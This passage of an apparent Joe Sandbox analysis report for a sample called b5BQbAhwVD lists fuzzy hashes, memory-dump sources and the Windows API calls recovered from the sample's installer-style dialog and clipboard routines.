                                                                                                                  • Opcode Fuzzy Hash: 747b27a3532d44f78fe314bed45c5ee34e6c0f21a96fea3962446adc77b14bb0
                                                                                                                  • Instruction Fuzzy Hash: 12C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 105cb77ae9c2c053befc247107ece2fc51ca8e364a57b6c3c0fc982909a13228
                                                                                                                  • Instruction ID: fe14fd00b62c24ff5e47e85b492c375f3c78c33555a08b1ceb93b7b1c482a631
                                                                                                                  • Opcode Fuzzy Hash: 105cb77ae9c2c053befc247107ece2fc51ca8e364a57b6c3c0fc982909a13228
                                                                                                                  • Instruction Fuzzy Hash: 19C1BF74E00218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5aa11a8265b700666d80b0e8d9442b84bd270bee2c60152095d864aa3679d230
                                                                                                                  • Instruction ID: 47d2c871bb92c451581d3dfb449100bc41e167d4bf7d1c4749c5d19b250da8ff
                                                                                                                  • Opcode Fuzzy Hash: 5aa11a8265b700666d80b0e8d9442b84bd270bee2c60152095d864aa3679d230
                                                                                                                  • Instruction Fuzzy Hash: 83C1B074E01218CFEB54DFA5C984B9DBBB2BF89300F2081A9D819BB355DB359A81CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0731757dd09c0aad9066fd2466d280bf88c2397042a5723638c07201678a18db
                                                                                                                  • Instruction ID: dc2052fd0de763ff566c03445011cdcf511b62233b746caeabcf13189a7c9e11
                                                                                                                  • Opcode Fuzzy Hash: 0731757dd09c0aad9066fd2466d280bf88c2397042a5723638c07201678a18db
                                                                                                                  • Instruction Fuzzy Hash: 29C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 14c798744edea41a170dce6c234fe1ffe0f6bfe48c9f8353c783e16e79db01ab
                                                                                                                  • Instruction ID: 4f0baef7fac7e512d1b785f44165e16737d1bad9c049e4c7592b216f6314294d
                                                                                                                  • Opcode Fuzzy Hash: 14c798744edea41a170dce6c234fe1ffe0f6bfe48c9f8353c783e16e79db01ab
                                                                                                                  • Instruction Fuzzy Hash: 77C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e26876f7fa997545ae7ade70d7833dfc19183308a47dc07066d9a88065bac7fd
                                                                                                                  • Instruction ID: a1495ada1620729e1516e9fbc83ac4e762109e2a444ce417324fb516e200f737
                                                                                                                  • Opcode Fuzzy Hash: e26876f7fa997545ae7ade70d7833dfc19183308a47dc07066d9a88065bac7fd
                                                                                                                  • Instruction Fuzzy Hash: 80C19074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a34dcb29382b843336c5adb20ca8d3082e7009f195166dac2a5fedbc3fe87ed6
                                                                                                                  • Instruction ID: af932709982bfafeccbead5f73f6cb589a6828ab307db984cb5cd852c289e14b
                                                                                                                  • Opcode Fuzzy Hash: a34dcb29382b843336c5adb20ca8d3082e7009f195166dac2a5fedbc3fe87ed6
                                                                                                                  • Instruction Fuzzy Hash: 89C19074E01218CFEB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1ed7a42cbfc88fe1a1545c21d0c80c9f3fa4c217cc478209d2985d1db53af9f2
                                                                                                                  • Instruction ID: 18265b04ea7e540aad390f3cd7fb862f9cac788e1c34c2969cb90f6047663073
                                                                                                                  • Opcode Fuzzy Hash: 1ed7a42cbfc88fe1a1545c21d0c80c9f3fa4c217cc478209d2985d1db53af9f2
                                                                                                                  • Instruction Fuzzy Hash: 44C19074E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ab4c0f3b4079d720b4b4a8a303e183f89a228384c44c2869b2b4d134363d42af
                                                                                                                  • Instruction ID: fceab3e7bf02e84e3a9cdee87c43fd57a4cc9de4f0fdf8e43903f07e8fc9c76c
                                                                                                                  • Opcode Fuzzy Hash: ab4c0f3b4079d720b4b4a8a303e183f89a228384c44c2869b2b4d134363d42af
                                                                                                                  • Instruction Fuzzy Hash: 66C1A074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A86CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1324b8b14d6373331d46d3da48fedec1de98d0d5e738690190f5a8c662883661
                                                                                                                  • Instruction ID: 9fbd65e9562c85dc1b4077d53c66b04b8f6f38a3c5463c9e8cd9bd3b8e2093f0
                                                                                                                  • Opcode Fuzzy Hash: 1324b8b14d6373331d46d3da48fedec1de98d0d5e738690190f5a8c662883661
                                                                                                                  • Instruction Fuzzy Hash: 0AC1BF74E00218CFDB54DFA9C994B9DBBB2BF89301F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1382fc4aa829906b2b315e10460958bfc2efac2ec6a2e533b49e2ca671af3b81
                                                                                                                  • Instruction ID: 6d07c5f8a17b6257bb0fc322956662e94a19909d07db18b3fdaaad581d03fc7b
                                                                                                                  • Opcode Fuzzy Hash: 1382fc4aa829906b2b315e10460958bfc2efac2ec6a2e533b49e2ca671af3b81
                                                                                                                  • Instruction Fuzzy Hash: 22C1B074E00258CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A86CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ae4ae11d1d7bd40e0ab56fee5cdb611f52ad8c5305f4e0b096be3f487bdf04b0
                                                                                                                  • Instruction ID: 9b8cec94b3e2b5b1c0faf809b30ac7bfcd66f8fd1b2f09521d7b878b40ee05a4
                                                                                                                  • Opcode Fuzzy Hash: ae4ae11d1d7bd40e0ab56fee5cdb611f52ad8c5305f4e0b096be3f487bdf04b0
                                                                                                                  • Instruction Fuzzy Hash: 6CC1AF74E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b0e27827a64e7d5e132812fc5b16998488766fb75d475b757945af16e561bd84
                                                                                                                  • Instruction ID: f39297e08f101d884f0f68470fea42f3a71edac5a82aa1a9ea071378951ba561
                                                                                                                  • Opcode Fuzzy Hash: b0e27827a64e7d5e132812fc5b16998488766fb75d475b757945af16e561bd84
                                                                                                                  • Instruction Fuzzy Hash: 51C19074E01218CFDB54DFA9C954B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4d6d7129f5c1b8d76ffa7e4bd8c51a556b778dcc837e514e6a08c6ceaf07184c
                                                                                                                  • Instruction ID: 047dee9ec744478fe8bdab1cab09a4003a8471f3ca37d044328351b42f45c3a4
                                                                                                                  • Opcode Fuzzy Hash: 4d6d7129f5c1b8d76ffa7e4bd8c51a556b778dcc837e514e6a08c6ceaf07184c
                                                                                                                  • Instruction Fuzzy Hash: F1C1BE74E00218CFEB54DFA5C994B9DBBB2AF89300F2080A9D819BB355DB359A81CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8130f5400fdca0807c3ddc0abb6a37963e5bf89a9eea5ede68c9ff3e974cdd19
                                                                                                                  • Instruction ID: 74952cbaeacbf58fce30aabe2b2ecdb349df43a4211f583135aeda24cfde2e0d
                                                                                                                  • Opcode Fuzzy Hash: 8130f5400fdca0807c3ddc0abb6a37963e5bf89a9eea5ede68c9ff3e974cdd19
                                                                                                                  • Instruction Fuzzy Hash: EEC1AF74E01218CFEB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 12e8697767c2ec4a2976c24e11ca803d0daceefc6a152896b35235d9224d5361
                                                                                                                  • Instruction ID: b1e69e679dd4247d0af1cd033bc5ef814746f8ab0cd4cffa5ca9a756394ece9a
                                                                                                                  • Opcode Fuzzy Hash: 12e8697767c2ec4a2976c24e11ca803d0daceefc6a152896b35235d9224d5361
                                                                                                                  • Instruction Fuzzy Hash: D9C1A074E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd7bde72e4700ad8f76f1b2718d87db4eb191e4ef75e727b914e7d409ccbabcd
                                                                                                                  • Instruction ID: 6ca0385a83af6b44c6cadd7e8a46eaa3ad1c4ee33f21c9bb93981ba974c113db
                                                                                                                  • Opcode Fuzzy Hash: fd7bde72e4700ad8f76f1b2718d87db4eb191e4ef75e727b914e7d409ccbabcd
                                                                                                                  • Instruction Fuzzy Hash: DDC1A074E01218CFDB54DFA9C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2436ec4a65db9914db5d65837bc92868e670a2d8baf5ce379c121fe63ff0c2b1
                                                                                                                  • Instruction ID: 6ec76d98f6032b087fbb63c95bb8acd58631472e1b1af5b449685c35fcdd8585
                                                                                                                  • Opcode Fuzzy Hash: 2436ec4a65db9914db5d65837bc92868e670a2d8baf5ce379c121fe63ff0c2b1
                                                                                                                  • Instruction Fuzzy Hash: 70C1AF74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D419BB355DB359A86CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5b37c69288309635a610f53eeb677dc5e6fe1eb0e6e6165f6a1e360c3a7dcc07
                                                                                                                  • Instruction ID: d294304d3bf0e745904657ca53f19a5ebc2f4d318ca3bd60ddb1b434945606bf
                                                                                                                  • Opcode Fuzzy Hash: 5b37c69288309635a610f53eeb677dc5e6fe1eb0e6e6165f6a1e360c3a7dcc07
                                                                                                                  • Instruction Fuzzy Hash: D8C19174E01218CFDB54DFA9C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 639b503504aaeea4f8b439f7b151507d7cbd59f06028c47dff44c08552733439
                                                                                                                  • Instruction ID: 410a76bfe6dab708ef920144c5f0e6c62c8cfc62ab8b58f46f19af422e011c5c
                                                                                                                  • Opcode Fuzzy Hash: 639b503504aaeea4f8b439f7b151507d7cbd59f06028c47dff44c08552733439
                                                                                                                  • Instruction Fuzzy Hash: 60C19074E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D419BB355DB359E86CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 37964ed7bf75fc3eabd3a5f6286a9f551aa43e2125ab041e1fd9b7053afa5e48
                                                                                                                  • Instruction ID: 7c34b231bdc4e4c6ce2a4355d701c705578bb070047f829453c0855ab179457e
                                                                                                                  • Opcode Fuzzy Hash: 37964ed7bf75fc3eabd3a5f6286a9f551aa43e2125ab041e1fd9b7053afa5e48
                                                                                                                  • Instruction Fuzzy Hash: F0B19F74E01218CFDB54DFA4C994B9DBBB2AF89300F6090A9D419BB365DB359E81CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 096c3ee9013f12058440f0b87382db9f1c1bf5c579e0b77337d779e40a5c7691
                                                                                                                  • Instruction ID: 0f7f508accf9b40c8e3a2034cc7f8bf6c2c9904feb8dc1dcc97ea31e28faa6a1
                                                                                                                  • Opcode Fuzzy Hash: 096c3ee9013f12058440f0b87382db9f1c1bf5c579e0b77337d779e40a5c7691
                                                                                                                  • Instruction Fuzzy Hash: 33B18078E01218CFDB54DFA4C994B9DBBB2AF89300F6081A9D419BB355DB359E85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 15b9e98ff625fa339e5d238ade1441a24c7fb6acdae524a411b765390a0251ab
                                                                                                                  • Instruction ID: 78fcb8a3a4007fc3819b474978c7275c20d423e56f197f2ed2ed2da50e31f082
                                                                                                                  • Opcode Fuzzy Hash: 15b9e98ff625fa339e5d238ade1441a24c7fb6acdae524a411b765390a0251ab
                                                                                                                  • Instruction Fuzzy Hash: 80D06775D142288ACB11DF98E8406ECB7B1EF9A311F0164A6C568A7600D6719A908E55
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                    • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                  • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                  • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                  • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                  • CloseClipboard.USER32 ref: 00405912
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                  • String ID: (7B${
                                                                                                                  • API String ID: 590372296-525222780
                                                                                                                  • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                                  • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                  • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                                  • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                  • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                  • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                  • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                  • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                  • String ID: (7B
                                                                                                                  • API String ID: 184305955-3251261122
                                                                                                                  • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                                  • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                  • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                                  • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                  • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,76233420,00435000,00000000), ref: 00403B59
                                                                                                                  • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
